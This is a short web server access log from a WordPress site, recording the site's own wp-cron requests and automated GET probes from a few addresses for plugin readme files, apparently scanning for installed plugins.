198.54.114.83 - - [30/Mar/2025:04:22:39 -0400] "POST /wp-cron.php?doing_wp_cron=1743322959.2668299674987792968750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
45.156.129.127 - - [30/Mar/2025:04:22:39 -0400] "GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1" 404 15309 "http://www.creative-webstyle.com/wp-content/plugins/wp-fastest-cache/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:22:50 -0400] "POST /wp-cron.php?doing_wp_cron=1743322970.4576299190521240234375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://creative-webstyle.com"
45.156.129.126 - - [30/Mar/2025:04:22:50 -0400] "GET /wp-content/plugins/iwp-client/readme.txt HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [30/Mar/2025:04:22:51 -0400] "GET /wp-content/plugins/iwp-client/readme.txt HTTP/1.1" 404 15305 "http://www.creative-webstyle.com/wp-content/plugins/iwp-client/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [30/Mar/2025:04:23:19 -0400] "GET /wp-content/plugins/kingcomposer/readme.txt HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [30/Mar/2025:04:23:20 -0400] "GET /wp-content/plugins/kingcomposer/readme.txt HTTP/1.1" 404 15309 "http://www.creative-webstyle.com/wp-content/plugins/kingcomposer/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [30/Mar/2025:04:23:34 -0400] "GET /wp-content/plugins/wp-time-capsule/readme.txt HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
